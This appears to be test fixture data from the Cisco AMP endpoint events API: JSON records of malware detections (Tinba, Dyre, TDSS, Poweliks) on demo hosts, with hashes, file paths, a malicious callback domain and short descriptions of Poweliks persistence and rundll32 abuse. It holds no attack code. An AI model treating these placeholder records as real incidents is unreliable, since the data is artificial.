+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666694928269000,"timestamp":1610705367,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:09:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666694928269316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":2204,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256962712306000,"timestamp":1610705364,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:09:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256962712305718","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617250006073000,"timestamp":1610705347,"timestamp_nanoseconds":296000000,"date":"2021-01-15T10:09:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617250006073346","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":706000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053698","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://dak1otavola1ndos.com/h/index.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":222000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053697","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617228531237000,"timestamp":1610705342,"timestamp_nanoseconds":937000000,"date":"2021-01-15T10:09:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617228531236865","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\My Documents\\Downloads\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415396303000800,"timestamp":1610705341,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.Variant:Tinba.15hl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705341,"start_date":"2021-01-15T10:09:01+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"bin.exe","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\Application Data\\default\\bin.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49","sha1":"194ada957926b985653f0400ede75175df6b48be","md5":"c141be7ef8a49c2e8bda5e4a856386ac"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":503000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086401","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Tinba.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Tinba.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256842453221000,"timestamp":1610705336,"timestamp_nanoseconds":643000000,"date":"2021-01-15T10:08:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256842453221429","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256790913614000,"timestamp":1610705324,"timestamp_nanoseconds":631000000,"date":"2021-01-15T10:08:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256790913613876","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256739374006000,"timestamp":1610705312,"timestamp_nanoseconds":619000000,"date":"2021-01-15T10:08:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256739374006323","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256687834399000,"timestamp":1610705300,"timestamp_nanoseconds":981000000,"date":"2021-01-15T10:08:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256687834398770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256636294791000,"timestamp":1610705288,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:08:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256636294791217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":699000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":559000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739226271700,"timestamp":1610705284,"timestamp_nanoseconds":226259000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Poweliks is a fileless click-fraud malware variant which resides within the registry. It maintains persistence by creating a registry key that makes use of rundll32 to execute javascript code to read Powershell from the Windows registry, which subsequently executes portable executable code in memory.","short_description":"W32.PoweliksPersistence.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739190653000,"timestamp":1610705284,"timestamp_nanoseconds":190644000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The rundll32 application is designed to run code present in DLLs. There is however a case where it can also be used in the same way as MSHTA to execute JavaScript code on the command-line.","short_description":"W32.rundll32RunHTMLApplication.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666334151016000,"timestamp":1610705283,"timestamp_nanoseconds":977000000,"date":"2021-01-15T10:08:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.B1380FD95B-100.SBX.TG","detection_id":"6533666334151016449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":3180,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256584755184000,"timestamp":1610705276,"timestamp_nanoseconds":957000000,"date":"2021-01-15T10:07:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256584755183664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709202491408000,"timestamp":1610705270,"timestamp_nanoseconds":802000000,"date":"2021-01-15T10:07:50+00:00","event_type":"Policy 